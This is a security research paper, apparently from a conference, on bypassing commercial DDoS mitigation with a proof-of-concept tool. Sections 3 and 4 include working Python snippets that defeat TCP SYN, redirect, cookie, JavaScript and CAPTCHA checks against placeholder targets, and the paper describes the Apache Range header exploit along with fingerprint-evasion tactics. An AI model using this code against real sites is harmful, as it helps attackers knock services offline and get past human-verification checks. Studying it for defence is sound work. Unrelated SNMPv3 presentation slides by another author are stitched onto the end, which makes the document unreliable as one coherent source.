knowledge you too can be a DDoS ninja! Our PoC attack tool "Kill-em-All"
will then be introduced as a platform to put what you've learned into practice,
empowering you to bypass all DDoS mitigation layers and get straight through
to the backend where havoc could be wrought. Oh and for the skeptics among
you, we'll be showing testing results against specific products and services.
Keywords: DDoS mitigation, DDoS, large-scale network attack
1 Introduction
DDoS attacks remain a major threat to internet security because they are relatively
cheap yet highly effective in taking down otherwise well-protected networks. One
need look no further than the attack on Spamhaus to realize the damage potential –
bandwidth clog peaked at 300Gbps, all from a mere 750Mbps generated attack traffic
[1]!
In the following sections, we first examine DDoS attacks observed in the wild and
commercially available mitigation techniques against those attacks, with brief
discussion on each technique’s inherent weaknesses. Next, we introduce bypass mechanisms that exploit these weaknesses and, through illustrating our proof-of-concept (PoC) tool “Kill ’em All”, show how bypass mechanisms can be combined to achieve total bypass, thereby defeating defense-in-depth design typically adopted in DDoS mitigation solutions.
To conclude, we substantiate our claim with testing results against specific mitigation solutions, and propose a next-gen mitigation methodology capable of defending against “Kill ’em All”-type attacks.

2 A Quick Overview

DDoS attacks are simple yet highly effective. These days DDoS attacks run so rampant they form a part of the everyday internet traffic norm. Over the past decade, DDoS attack and defense technologies have evolved tremendously through an arms race, leading to old-school protections completely losing their relevance in the modern days. Before we examine the technical details let’s start with a classification system [2].

2.1 DDoS Attack Classification Quadrant

It is helpful to classify DDoS attacks according to their attack volume and complexity, with reference to Figure 1 below.

Figure 1. DDoS attack classification quadrant
The crudest form of DDoS attack is the volumetric DDoS attack, whereby a huge
volume of traffic pours into the victim in a brute-force manner, hogging all bandwidth
otherwise available for legitimate purposes. Execution is expensive, as the attacker
would have to send traffic whose volume is on par with the victim’s spare capacity.
This translates to a higher monetary cost associated with hiring botnets. The age-old
ping flood is a prime example.
Semantic DDoS attacks work smarter, amplifying firepower by exploiting semantic
contexts such as protocol and application weaknesses [3]. This effectively tips the
balance in the attacker’s favor, making attacks much cheaper. Examples of semantic
attacks include Slowloris [4] and Smurf [5] attacks, as well as application level
attacks that make excessive database lookups in web applications.
A third category, blended DDoS attacks, aims to achieve stealthy attacks through blending into legitimate traffic, practically rendering ineffective most countermeasures designed to filter out abnormal, presumably malicious, traffic. HOIC [6] is an example of an attack that employs blending techniques via randomized headers.
Note that these categories are by no means mutually exclusive. For instance,
blended attacks that also exploit application weaknesses are not at all uncommon in
the wild.
2.2 DDoS Mitigation Techniques

Mitigations are techniques used to reduce the impact of attacks on the network. The upcoming paragraphs [2] explain the three main types of mitigation, namely traffic policing, black/white listing, and proactive resource release, as shown in Figure 2.
Figure 2. DDoS mitigation techniques

Against volumetric attacks, a direct mitigating tactic employs traffic policing to curb attack traffic. Common implementations typically involve baseline enforcement and rate limiting, whereby traffic that exceeds a capacity threshold or otherwise violates predetermined traffic conditions (baseline profile) are forcibly suppressed to ensure conformance with capacity rules. This is usually achieved through selective packet dropping (traffic policing), or outright blacklisting of infringing traffic sources.

Blacklisting is essentially a short circuit mechanism aimed at cutting down the tedious work of having to classify individual flows by outright dropping traffic from entire IP addresses for a certain period of time or for a certain amount of traffic volume immediately upon identification of one attack from those sources. Blacklisting cannot be permanent, as IP addresses can be dynamically assigned and zombied computers can be repaired. In contrast to blacklisting, whitelisting preapproves traffic from entire IP addresses for a certain period of time or for a certain amount of volume upon determining those sources are well behaving.

Another approach that is most effective against resource starvation attacks is proactive resources release whereby resources prone to starvation are forcibly freed up. For compatibility and scalability reasons, commercial mitigation solutions are usually deployed externally to individual computer systems and networking devices, treating them as black boxes. This precludes housekeeping measures that require host-based mechanisms such as enlarging the TCP concurrent connection pool. That said, resource freeing by means of TCP connection reset can be instrumented externally: sending a TCP RST packet to a server host is sufficient to close and free up a connection. For TCP-based DDoS attacks, forceful TCP connection reset is a very practical control mechanism. Resource holding attacks like Slowloris [2] are best handled with proactive resources release.

2.3 DDoS Detection Techniques

Referring to Figure 3 below, at the top left-hand corner we have high volume attacks which are dead obvious in their footprints, easily detectable with rate measurement and baselining methods via straightforward SNMP or Netflow monitoring respectively; at the other end of the spectrum at the bottom right-hand corner attacks get smaller and cleverer, for those, protocol sanity and behavior inspection, application-level examination (via syslog mining / application log analysis), or even protocol statistics and behavior big-data analysis are often required for detection.

Figure 3. DDoS detection techniques

Indeed, rate metering and baseline enforcement can be applied to specific source IP addresses or to address ranges such as entire subnets. But, a pure traffic policing approach cannot correlate across unrelated sources, because that would require visibility into traffic characteristics deeper than just capacity rule violations.

Semantic attacks usually follow specific patterns. For instance, Teardrop Attack’s telltale signature is its overlapping IP fragments. Checking for these signatures may not be trivial to implement but nevertheless provides definite criteria for filtering. It is for this reason that protocol sanity and behavior checking are mostly effective for catching known semantic attacks.
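To make that concrete, here is a hedged Python sketch of such a signature check (not from the paper): it flags overlapping IP fragments, the Teardrop telltale, over a simplified list of (packet id, offset, length) tuples that a real detector would parse from live capture.

from collections import defaultdict

def has_overlapping_fragments(fragments):
    # fragments: iterable of (packet_id, offset_bytes, payload_len) tuples,
    # which a real detector would parse out of captured IP headers.
    spans_by_id = defaultdict(list)
    for pkt_id, offset, length in fragments:
        spans_by_id[pkt_id].append((offset, offset + length))
    for spans in spans_by_id.values():
        spans.sort()
        for (_, end_prev), (start_next, _) in zip(spans, spans[1:]):
            if start_next < end_prev:  # fragment starts inside its predecessor
                return True
    return False

# Teardrop-style datagram: the second fragment overlaps the first.
print(has_overlapping_fragments([(1, 0, 36), (1, 24, 28)]))  # -> True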
Modern application-level attacks do their dirty works at upper layers, exhibiting no
abnormal behavior at the lower layers. Detection therefore would have to work on
application-level behaviors, via syslog or application log analysis methods.
Traffic statistics and behavior big data analysis aims at building a baseline profile
of traffic such that significant deviation at runtime can trigger a red flag. Generally
data-mining can work on profiling protocol parameters, traffic behaviors, and client
demographics.
3 Authentication Bypass
In response to mitigation techniques that excel at filtering out malformed traffic,
blended attacks gained popularity. They strive to evade filtering by mimicking
legitimate traffic, for example by having HTTP requests bear a believable real-world User-Agent string and variable lengths.
3.1 TCP SYN Authentication
With this method, the authenticity of the client’s TCP stack is validated through
testing for correct response to exceptional conditions, such that spoofed source IPs
and most raw-socket-based DDoS clients can be detected. Common tactics include
sending back a RST packet on the first SYN expecting the client to retry, as well as
deliberately sending back a SYN-ACK with wrong sequence number expecting the
client to send back a RST and then retry.
The best approach to defeating this method is to have the OS networking stack
handle such tests. There are essentially two methods:
Figure 4. TCP reset
TCP Reset — the anti-DDoS gateway will send reset (RST) flags to forcefully reset the
backend’s established TCP connections (those having successfully completed three-
way handshaking) as shown in Figure 4. It is the most common method for TCP
connection verification, as purpose-built DDoS bots may not have the retry logic
coded, unlike a real browser. However, a drawback of this method is that an error
page will show up on the browser, confusing the user to no end, who has to manually
reload the web page.
Figure 5. TCP out-of-sequence
TCP Out-of-sequence — Unlike TCP Reset, the anti-DDoS gateway can deliberately
pose a challenge to the client by sending SYN-ACK replies with an out-of-sequence
sequence number as shown in Figure 5. Since the sequence number is incorrect, the
client is supposed to reset the TCP connection and re-establish the connection
again. Again a purpose-built bot would likely not be so smart. Compared with TCP
Reset, this method has the added advantage that it would not introduce a strange user
experience.
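As a concrete illustration, here is a minimal sketch of the OS-stack approach (host, port and retry counts are placeholders): a plain blocking connect() already answers a wrong-sequence SYN-ACK with a RST per the TCP specification, so the only extra logic a client needs is a retry loop for the deliberate reset round.

import socket
import time

def connect_with_retry(host, port, attempts=3):
    # The OS stack transparently handles the out-of-sequence SYN-ACK
    # challenge; we only add retries for the deliberate first-SYN reset.
    for _ in range(attempts):
        try:
            return socket.create_connection((host, port), timeout=5)
        except (ConnectionResetError, socket.timeout, OSError):
            time.sleep(0.5)  # back off, then retry like a real client would
    raise ConnectionError("could not pass TCP SYN authentication")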
3.2 HTTP Redirect Authentication
The basic idea is that a legitimate browser will honor HTTP 302 redirects. As such,
by inserting artificial redirects, it would be safe to block non-compliant clients.
Figure 6. HTTP redirect authentication
Clearly, it is not particularly difficult to implement just enough support for HTTP redirects to fool HTTP Redirect Authentication. The purpose of this authentication is to distinguish botnets from HTTP-compliant applications.
[Figure 5 sequence: client SYN; mitigation device SYN-ACK with wrong seq. no.; client RST; client SYN again; SYN-ACK; ACK]
[Figure 6 sequence: client GET <server>/index.html; HTTP 302 redirect to <mitigation device>/foo/index.html; client GET <mitigation device>/foo/index.html; HTTP 302 redirect to <server>/index.html; client GET <server>/index.html]
3.3 HTTP Cookie Authentication
For similar purpose, this method as shown in Figure 7 works like, and is usually used
together with, HTTP Redirect Authentication. Essentially, browser’s cookie handling
is tested. Clients that do not carry cookies in subsequent HTTP requests are clearly
suspect and can be safely blocked.
Figure 7. HTTP cookie authentication
Some mitigation devices may allow administrator to configure custom field name
for the HTTP cookie instead of standard one as shown in Figure 8. However, not all
browsers will support this feature and thus it is not widely used.
Figure 8. HTTP cookie authentication with header token
As in adding support for HTTP Redirect Authentication, cookie support does add
additional complexity and reduces raw firepower in DDoS attacks, but is nevertheless
easy to implement.
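A minimal sketch shows how little code defeats both checks (the target URL is a placeholder; the requests library is assumed): requests.Session follows the 302 chain of Figure 6 and replays any Set-Cookie value from Figure 7 automatically, and its headers= argument would cover the custom X-header variant of Figure 8.

import requests

session = requests.Session()
# Follows the full 302 redirect chain and stores any cookie handed out.
resp = session.get("http://target.example/index.html")
print(resp.status_code, session.cookies.get_dict())
for hop in resp.history:  # the redirect hops that were transparently followed
    print(hop.status_code, hop.headers.get("Location"))
# Every later request replays the cookie, passing the authentication.
session.get("http://target.example/index.html")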
3.4 JavaScript Authentication
With JavaScript Authentication, a piece of JavaScript code embedded in the HTML is
sent to clients as a challenge as shown in Figure 9. Obviously, only clients equipped
with a full-fledged JavaScript engine can perform the computation. It would not be
economical for DDoS attack tools to hijack or otherwise make use of a real
heavyweight browser to carry out attacks. The purpose of Javascript authentication is
to identify whether the HTTP request is sent from a real browser or not.
Figure 9. Javascript authentication
An extended implementation would make use of UI elements such as JavaScript
dialog boxes or detecting mouse movements in order to solicit human inputs. Going
this far would impede otherwise legitimate automated queries, making this
mechanism only suitable for a subset of web sites designed for human usages, but not
those web APIs such as REST web services.
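As a hedged sketch of that approach, the snippet below uses js2py, a pure-Python JavaScript interpreter; the script-extraction regex and the jschl_answer field name are illustrative assumptions, since real challenge formats vary by vendor.

import re
import requests
import js2py

session = requests.Session()
page = session.get("http://target.example/index.html").text
# Pull the challenge script out of the served HTML (format varies by vendor).
challenge = re.search(r"<script>(.*?)</script>", page, re.S).group(1)
answer = js2py.eval_js(challenge)  # evaluate the obfuscated arithmetic
session.post("http://target.example/auth.php", data={"jschl_answer": answer})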
3.5 CAPTCHA Authentication
A very heavy-handed approach that involves human intervention whereby CAPTCHA
challenges are inserted into suspicious traffic as shown in Figure 10. If the client end
is successful in solving the CAPTCHA, it will be whitelisted for a certain period of
time or for certain amount of subsequent traffic, after which it will need to
authenticate itself again. The purpose of this authentication is to distinguish whether
the request is initiated by a real human or a bot.
Figure 10. CAPTCHA authentication
This method is, in itself, rather intrusive and in practice used only sparingly. While
far from easy, automated means to solve CAPTCHA do exist and is a topic of
ongoing research.
[Figure 9 sequence: client GET <server>/index.html; HTTP 200 /js.htm; client POST <mitigation device>/auth.php; HTTP 302 redirect to <server>/index.html; client GET <server>/index.html]
[Figure 10 sequence: client GET <server>/index.html; HTTP 200 /captcha.htm; client POST <mitigation device>/auth.php; HTTP 302 redirect to <server>/index.html; client GET <server>/index.html]
4 PoC Tool Design and Implementation

Through extensive testing we have developed a methodology capable of bypassing all commercial mitigation solutions. The key idea is to satisfy source host verification (authentication) so as to be cleared of further scrutiny, and then send attack traffics staying just below traffic threshold. A proof-of-concept tool “Kill ‘em All” developed to demonstrate the effectiveness of this approach, is shown in Figure 11.

Figure 11. Proof-of-Concept Tool "Kill 'em All"

In practice, an entire suite of authentication mechanisms covering multiple layers work in unison to challenge traffic sources. We examine the approach taken to defeat each of them below.

After successful authentication, oftentimes the source IP addresses would have been placed on to the whitelist, meaning a number of expensive checks will be skipped in the interest of performance. This affords the attacker a certain period of free reign over the cleared network path.

As described in [2], IP addresses would just be whitelisted for a period of time. Therefore, the authentication process will repeat after a certain time interval, say for every 5 minutes. All attack requests sent after re-authentication will use the new authentication code.

Nevertheless we found that certain traffic rules must be observed still, as attack discovery mechanisms such as rate measurement are usually not disabled even when the source is whitelisted. Tactics against this are outlined below as well.

“Kill ‘em All” was designed to use the OS stack to handle user requests. Using the low-level OS networking library, it can fully simulate a bona fide web client. Moreover, even if the anti-DDoS device attempts source host verification, like TCP SYN auth, TCP redirect or some JavaScript test, our program still is capable of “proving” its authenticity, by relegating the task to a real web browser.
“Kill ‘em All” will attempt bypass 3 times for each HTTP redirect challenge, this
way TCP Reset and the TCP Out-of-Sequence auth can be properly defeated. Indeed
this is how a real client will handle retries and redirects.
4.1 Cookie Authentication
For HTTP cookie authentication, our tools will spawn a web browser to process the
cookie request. The cookie is attached to all subsequent attack requests we send.
4.2 JavaScript Authentication
“Kill ‘em All” can fully handle JavaScript thanks to an embedded JavaScript engine.
This JavaScript capability makes it look like a real browser, because JavaScript
capability is very uncommon in DDoS bots.
For proper handling of Javascript, we have incorporated the V8 JavaScript engine.
Ideally a full DOM should be implemented but for the purpose of passing
authentication a subset of DOM was sufficient.
Attack tools however, can incorporate standalone JavaScript engines such as
Spidermonkey or V8 which are relatively lightweight and would not bog down
attacks too much. As of this writing, the major challenge with this bypass method lies
with adequate DOM implementation.
4.3 CAPTCHA Authentication
Widely considered the final frontier for source host verification, CAPTCHAs are not
completely unbreakable by automated means. In “Kill ‘em All” we have implemented
CAPTCHA capability whereby CAPTCHA challenges are automatically processed
and answered. Given sufficient baseline training, the success rate can be near perfect.
We couldn’t find a lightweight cross-platform CAPTCHA library, so we’ve implemented our own. The algorithm first converts the CAPTCHA image to black-and-white to enhance contrast. Then a 3 by 3 median filter is applied to remove background noises such as dots and thin lines. Afterwards words are segmented into individual characters and their boundaries detected. Finally, characters are compared against a trained baseline based on simple pixel differences. Against NSFocus ADS, a success rate of nearly 50% was achieved.
Some CAPTCHAs might have rotated or curved characters. These will require a more complex algorithm such as vector quantization or a neural network for recognition. As for reCAPTCHA, its audio CAPTCHA functionality is much weaker than the standard visual counterpart; a simple voice recognition algorithm will be sufficient for breaking it.
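A hedged Python sketch of this pipeline using Pillow follows (the trained templates dict mapping characters to images is hypothetical and its loading is omitted):

from PIL import Image, ImageFilter

def solve_captcha(path, templates):
    # 1. Binarize to boost contrast, then apply a 3x3 median filter to drop
    #    background dots and thin lines.
    img = Image.open(path).convert("L").point(lambda p: 255 if p > 128 else 0)
    img = img.filter(ImageFilter.MedianFilter(3))
    # 2. Segment characters: a column with any black pixel belongs to a glyph.
    cols = [min(img.getpixel((x, y)) for y in range(img.height))
            for x in range(img.width)]
    glyphs, start = [], None
    for x, c in enumerate(cols + [255]):
        if c == 0 and start is None:
            start = x
        elif c != 0 and start is not None:
            glyphs.append(img.crop((start, 0, x, img.height)))
            start = None
    # 3. Nearest-template match by simple pixel difference.
    def diff(a, b):
        b = b.convert("L").resize(a.size)
        return sum(abs(pa - pb) for pa, pb in zip(a.getdata(), b.getdata()))
    return "".join(min(templates, key=lambda ch: diff(g, templates[ch]))
                   for g in glyphs)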
4.4 TCP Traffic Model

“Kill ‘em All” provides tunable TCP traffic parameters as shown in Figure 12 so that different kinds of DDoS attacks can be executed. The number of connections, connections interval, connection hold time before first request, connection idle timeout after last request are exposed to the user; through setting them to different values, different combinations can be constructed. Many protection systems can be defeated with specific parameter profiles. Figuring out the right set of parameters is, however, a combination of art and science, and a lot of trial and errors.

Figure 12. TCP timing controls

On the TCP/IP layer, historically, due to performance reason many DDoS attack tools were written in a quick and dirty way using raw sockets, resulting in non-compliant TCP/IP behaviors that can be used as a factor differentiating attack traffics from legitimate ones.

With web sites and web services gaining overwhelming dominance over the internet, so are contemporary attacks focusing on the HTTP layer. Smarter attacks and proliferation of botnets together serve to lessen the need for super high-efficiency attacks relying on raw sockets, a staple of the old time. The modern day application layer attacks are just as devastating, if not more so, than their old-school counterparts. Application layer attacks have the luxury of simply using the standard OS TCP/IP stacks. Other than easier to implement, this design approach has an added benefit of being able to pass any RFC conformance check.

As described in previous section, rate limiting mechanisms, be they time-based, volume-based, request-based or otherwise, can be defeated via a careful assessment of the triggering threshold and control of the rate of attack traffics to stay just below it. The reduction in firepower can be more than compensated with the use of large botnets.
4.5 HTTP Traffic Model

“Kill ‘em All” also provides tunable HTTP traffic parameters as shown in Figure 13 to offer various attack vectors. For example, a large number of requests per connection with short requests interval would yield a GET flood DDoS attack.

Figure 13. HTTP timing controls

In order to avoid being fingerprinted, we have implemented randomization for such attributes as User-Agent strings and packet sizes.

“Kill ‘em All” allows for the construction of certain web server or web app targeted attacks. For instance, the CVE-2011-3192 Apache Range Header exploit can be constructed with a custom header setting of “Range: bytes=<long list of numbers with comma as delimiter>”.

5 Performance Testing

Tests were conducted against products:
1. Arbor Peakflow SP Threat Management System (TMS) version 5.7, and
2. NSFocus Anti-DDoS System (ADS) version 4.5.88.2.026
as well as cloud services:
3. Cloudflare, and
4. Akamai.

We are convinced that Arbor TMS and NSFocus ADS represent a majority of the market, with the former most prevalent among Fortune 500 enterprises and the latter deployed in most every publicly listed company in mainland China.

5.1 Testing Methodology

Tests were conducted against products and cloud services. For product testing an attack workstation was connected to a web site through the DDoS mitigation device under test. For cloud service testing a web site was placed under the protection of the
service under test, and then subjected to attacks from a workstation directing attacks
towards it through the internet.
In order to simulate normal short-term browsing conditions, in all tests a single
TCP connection was used to carry a multitude of HTTP requests and responses.
Under this vigorous arrangement not a single attack identification mechanism can be
triggered lest the entire connection gets blocked.
During testing, attack traffic was sent to the backend at which point received traffic
was compared against the original generated traffic. Bypass was considered
successful if all attack traffic passed through intact.
5.2 Testing Results
Attacks with bypass capability were applied against individual detection techniques as implemented on the aforementioned products and services. During the attack, effectiveness of the attacks was evaluated and observations were recorded as shown in Table 1 below. A “✓” means the bypass was successful with no mitigation activity observed.
Detection Techniques | Arbor Peakflow SP TMS | NSFocus ADS | Cloudflare | Akamai
Rate Measurement / Baseline Enforcement (Zombie Removal, Baseline Enforcement, Traffic Shaping, Rate Limiting) | ✓ | ✓ | N/A | N/A
Protocol Sanity & Behavior Checking (HTTP Countermeasures) | ✓ | ✓ | N/A | N/A
Proactive Housekeeping (TCP Connection Reset) | ✓ | ✓ | N/A | N/A
Big Data Analysis (GeoIP Policing) | ✓ | — (not implemented in ADS) | N/A | N/A
Malicious Source Intelligence (Black White List, IP Address Filter List, Global Exception List, GeoIP Filter List) | ✓ | — (not implemented in ADS) | N/A | N/A
Protocol Pattern Matching (URL/DNS Filter List, Payload Regex) | ✓ | ✓ | N/A | N/A
Source Host Verification: TCP SYN Authentication | ✓ | ✓ | N/A | N/A
Source Host Verification: HTTP Redirect Authentication | ✓ | ✓ | ✓ | N/A
Source Host Verification: HTTP Cookie Authentication | ✓ | ✓ | ✓ | N/A
Source Host Verification: JavaScript Authentication | — (not implemented in TMS) | ✓ | ✓ | N/A
Source Host Verification: CAPTCHA Authentication | — (not implemented in TMS) | ✓ | — | N/A
Table 1. Mitigation bypass testing results.
With reference to Arbor Network’s A Guide for Peakflow® SP TMS Deployment1,
against TMS we were able to defeat all documented or otherwise active detection
techniques relevant to HTTP DDoS attacks, passing through the TMS unscathed.
Attacks against NSFocus ADS2 were met with remarkable success despite the
presence of heavy-handed defenses including CAPTCHA Authentication — we were
able to achieve a remarkable 50% success rate solving ADS’s CAPTCHA
implementation with our OCR algorithms. Due to the shotgun approach to attack, and
that getting whitelisted is a big win for the attacker, a 50% success rate for solving
CAPTCHA is much more impressive than it may appear at first glance.
Cloudflare essentially employs JavaScript that implements all JavaScript, Cookie
and Redirect Authentications in one. We were successful in defeating them all and
pushing attack traffic to the backend. Even though Cloudflare does support
CAPTCHA Authentication, we observed that its use is not particularly prevalent in
the wild, and for the purpose of our PoC since we have already demonstrated a
workable solution against CAPTCHA for ADS, we have opted not to repeat this for
Cloudflare.
Akamai has implemented source host verification techniques in its security
solutions for a few months now, with which according to marketing brochure [7]
visitors will be redirected to a JavaScript confirmation page when traffic is identified
as potentially malicious. However, despite our best effort sending big traffic to our
testing site bearing random HTTP query strings (in order to thwart caching) we have
been unable to trigger that feature. Whereas we cannot rule out the remote possibility
that our test traffic was way below detection threshold, a much more plausible reason
might be that our traffic was indistinguishable from that generated by a real browser.
1 http://www.arbornetworks.com/component/docman/doc_download/301-threat-management-system-a-technical-overview?Itemid=442
2 http://www.nsfocus.com/jp/uploadfile/Product/ADS/White%20Paper/NSFOCUS%20ADS%20White%20Paper.pdf
6 Discussions and Next Generation Mitigation
In this era of blended attacks, detection methods designed to pick out bad traffics are
rendered fundamentally ineffective. The reason why today to a certain extent they still
work is mainly due to implementation immaturity (e.g. the lack of ready-to-use
JavaScript engine with a workable DOM). Obviously these hurdles can be easily
overcome given a little more time and development resources, as our research
demonstrated.
A notable exception is the use of CAPTCHA. Despite the fact that we have also
demonstrated defeating certain CAPTCHA implementations in use on security
products, and that there have been promising results from fellow researches [8] as
well, admittedly CAPTCHA still represent the pinnacle of source host verification
technique. However, CAPTCHA is necessarily a heavy-handed approach that
materially diminishes the usability and accessibility of protected web sites.
Specifically, automated queries and Web 2.0 mashing are made impossible. This
shortcoming significantly reduces the scope of its application. It is therefore not
surprising that CAPTCHA is often default off in security service offerings.
6.1 Next Generation Mitigation
Seeing as that the underlying issue with a majority of DDoS attacks these days is their
amplification property, which tips the cost-effectiveness balance to the attackers’
favor, we are convinced that a control mechanism based on asymmetric client puzzle
is the solution, as it presents a general approach that attacks directly this imbalance
property, making it a lot more expensive to execute DDoS attacks. Prior researches
include the seminal Princeton-RSA paper [9] and [10].
7 Acknowledgement
This research was made possible only with data and testing resources graciously
sponsored by Nexusguard Limited3 for the advancement of the art.
References
[1] M. Prince, "The DDoS that Knocked Spamhaus Offline (And How We Mitigated it)," 20 March 2013. [Online]. Available: http://blog.cloudflare.com/the-ddos-that-knocked-spamhaus-offline-and-ho.
[2] T. T. N. Miu, A. K. T. Hui, W. L. Lee, D. X. P. Luo, A. K. L. Chung and J. W. S. Wong, "Universal DDoS Mitigation Bypass," in Black Hat USA, Las Vegas, 2013.
3 http://www.nexusguard.com/
[3] C. Weinschenk, "Attacks Go Low and Slow," IT Business Edge, 3 August 2007. [Online]. Available: http://www.itbusinessedge.com/cm/community/features/interviews/blog/attacks-go-low-and-slow/?cs=22594.
[4] R. Hansen, "Slowloris HTTP DoS," 7 June 2009. [Online]. Available: http://ckers.org/slowloris/.
[5] Carnegie Mellon University, "CERT® Advisory CA-1998-01 Smurf IP Denial-of-Service Attacks," 5 January 1998. [Online]. Available: http://www.cert.org/advisories/CA-1998-01.html.
[6] J. Breeden II, "Hackers' New Super Weapon Adds Firepower to DDOS," GCN, 24 October 2012. [Online]. Available: http://gcn.com/articles/2012/10/24/hackers-new-super-weapon-adds-firepower-to-ddos.aspx.
[7] Akamai, "Akamai Raises the Bar for Web Security with Enhancements to Kona Site Defender," 25 February 2013. [Online]. Available: http://www.akamai.com/html/about/press/releases/2013/press_022513.html.
[8] DC949, "Stiltwalker: Nucaptcha, Paypal, SecurImage, Slashdot, Davids Summer Communication," 26 July 2012. [Online]. Available: http://www.dc949.org/projects/stiltwalker/.
[9] B. Waters, A. Juels, J. A. Halderman and W. F. Edward, "New Client Puzzle Outsourcing Techniques for DoS Resistance," in ACM Conference on Computer and Communications Security (CCS), 2004.
[10] D. Stebila, L. Kuppusamy, J. Rangasamy and C. Boyd, "Stronger Difficulty Notions for Client Puzzles and Denial-of-Service-Resistant Protocols," in RSA Conference, 2011.
[11] T. Miu, A. Lai, A. Chung and K. Wong, "DDoS Black and White "Kungfu" Revealed," in DEF CON 20, Las Vegas, 2012.
[12] R. Kenig, "How Much Can a DDoS Attack Cost Your Business?," 14 May 2013. [Online]. Available: http://blog.radware.com/security/2013/05/how-much-can-a-ddos-attack-cost-your-business/.
Slide 1
Replacing TripWire with SNMPv3
Matthew G. Marsh
Chief Scientist of the NEbraskaCERT
Slide 2
Scope
Quick Overview & History of SNMP
Definitions & Terminology
SNMPv3 will be implicit in the rest of the sections
RFC(s) that define v3
Highlights - why use v3
Authentication
Privacy
Security Scope
General Usage
Net-SNMP
PakDefConX MIB
PakDefConX Source Code
Usage Example
Discussion
Slide 3
History
SNMP is defined by four features:
A data definition language
Management Information definition
A protocol definition
Security and Administration definition
Standard 15 defines the protocol (SNMP)
Standard 16 defines the structure of management information
Standard 17 defines MIB-II
All SNMP information and organization is specified using Abstract Syntax Notation One (ASN.1) (ISO Standard)
SNMPv1 came into being and use in the late 1980's. By 1990 most equipment capable of speaking TCP/IP used SNMPv1 for
management capabilities. Some vendors, most notably WellFleet, used SNMP as the basis for all interaction with the
equipment.
SNMPv1 was defined by three modes of operation
Read - a mode of obtaining information from a device based on a query/response
Write - a mode of setting parameters within a device based on query/response
Trap - a mode for a device to send information about itself without a query
These first two modes used basic single passwords as the authentication and security measures
SNMPv1 was designed for and used UDP as the main transport mode
Contrary to popular belief v1 did provide a framework for authentication, privacy, and authorization; however there were no
actual protocol structures, designs, or implementations done within this framework.
SNMPv2 came in several incarnations as it was developed. One of the primary original design goals for v2 was to structure
and design authentication, privacy, and authorization. However this was not realized although much of the structure formality
was completed.
SNMPv2 added better data types and efficiency along with the first use of TCP for data transport confirmation
SNMPv2 essentially came in three major flavours: v2c, v2u, v2*(v2p)
V2c was "officially endorsed" but v2u/v2p had security structures (authentication, privacy, authorization)
Slide 4
Definitions and Terminology
Abstract Syntax Notation One (ASN.1) (ISO Standard)
.1.3.6.1 = .iso.org.dod.internet
This is the tree from whence all MIB things come... ;-}
OID - Object ID is the reference to the ASN.1 code which defines an object
.1.3.6.1.4.1.9248 is the OID assigned to Paktronix Systems LLC
Paktronix Systems MIBs would begin from this OID and branch outward and downward
.1.3.6.1.4.1.9248.1.1.1 is the settable string of the file to be hashed and is fully decoded as:
.iso.org.dod.internet.private.enterprises.Paktronix.PakDC.PakSETFiles.PakTestFileString
Structure of Management Information - SMI defines the structure of the data (data definition language)
SMIv1 is the format used in SNMPv1/v2
SMIv2 is the new extended improved format
Community - the password used in v1 and v2c
Read was by popular default = public
Write was by popular default = private
Agent - the device about which information is desired
Hub, router, coffee machine ^H^H Java Dispenser...
Manager - the device which "manages" an agent
NetView, OpenView, Tivoli, Unicenter, etal are Managers
Managers typically query many remote agents but in some cases you can have a device that is both manager and agent in
one.
MIB - Management Information Base
Think of a database tree with all of the relevant information for a particular device
Generic MIB is called MIB-II (as opposed to MIB-I...) and is defined in RFC 1213
Authentication - proving you are who you say you are (password/community/...)
Privacy - encryption of the data in transport
Authorization - Access Control applied to MIBs
Authorization is typically done by specifying subsets or even individual OIDs
Trap - an Agent initiated data transfer
Slide 5
RFC Documents
SNMP Version 3 is the current version of the Simple Network Management
Protocol. This version was ratified as a Draft Standard in March of 1999.
RFC 2570: Introduction to Version 3 of the Internet-standard Network Management Framework, Informational, April 1999
RFC 2571: An Architecture for Describing SNMP Management Frameworks, Draft Standard, April 1999
RFC 2572: Message Processing and Dispatching for the Simple Network Management Protocol (SNMP), Draft Standard, April
1999
RFC 2573: SNMP Applications, Draft Standard, April 1999
RFC 2574: User-based Security Model (USM) for version 3 of the Simple Network Management Protocol (SNMPv3), Draft
Standard, April 1999
RFC 2575: View-based Access Control Model (VACM) for the Simple Network Management Protocol (SNMP), Draft Standard,
April 1999
RFC 2576: Coexistence between Version 1, Version 2, and Version 3 of the Internet-standard Network Management
Framework, Proposed Standard, March 2000
These documents reuse definitions from the following SNMPv2 specifications:
RFC 1905: Protocol Operations for Version 2 of the Simple Network Management Protocol (SNMPv2), Draft Standard
RFC 1906: Transport Mappings for Version 2 of the Simple Network Management Protocol (SNMPv2), Draft Standard
RFC 1907: Management Information Base for Version 2 of the Simple Network Management Protocol (SNMPv2), Draft
Standard
Slide 6
SNMPv3 Highlights
Authentication
MD5 or SHA authentication passphrase hashes
Passphrase must be greater than 8 characters including spaces
Privacy
Packet data may now be DES encrypted (future use allows additional encryptions)
Passphrase defaults to authentication passphrase
Allows for unique Privacy passphrase
Inform Traps
Old style trap was "throw-n-pray" over UDP
v2 Inform trap is over TCP and requires a response
Traps may also have Authentication and Privacy passphrases
Security Structures
User / Scope / ACL all may have independent AuthPriv structures
SNMP Version 3 - Important Points
Slide 7
Authentication
User
Defines the unit of access
Group
Defines class for application of scope
View
Defines a set of resources within a MIB structure
Operation
Defines the actions that may be performed
READ
WRITE
ADMINISTER
Operations are applied to Views
Users are assigned to Groups
Groups are assigned Views
SNMP Version 3 - Authentication
Slide 8
Privacy
SNMP v1 and v2c transported data in clear text
v3 allows the data payload to be encrypted
Currently the specification only allows for DES
May be overridden for custom applications
Specification allows for multiple encryption mechanisms to be defined
Passphrase defaults to using the authentication passphrase
Passphrase may be completely separate and unique
Privacy must be specified in conjunction with authentication
Allowed: NONE, authnoPriv, authPriv
SNMP Version 3 - Privacy
Slide 9
Security Structures
Passphrases are applied to User object only in current specification
Thus divorcing the ACL applied to the User from the AuthPriv functions
Each User object may have unique passphrases
Specification extensions are being considered to allow
Passphrases for Groups
Passphrases for Views
Multiple Passphrases per User
Per Operation Mode
Typically there is one User defined per Operation Mode
SNMP Version 3 - Security Structures
Slide 10
Misc Implementation Notes
Implementation is requestor/provider model
On Provider
Services through daemon process
Concept of "Engine ID"
Core of authPriv passphrases security
First pass hash mechanisms for storage
On Requestor
Services through query of Provider
"Engine ID" also important
Engine ID provides significant security addition through first pass hash
SNMP Version 3 - Misc
Slide 11
General Usage Notes
Use multiple Users
One for each action (get, set, trap)
Different Authentication passphrases
Always use Privacy - authPriv
Make sure the passphrases are different from the User's
For custom applications consider defining and using your own
authentication and privacy encryption methods
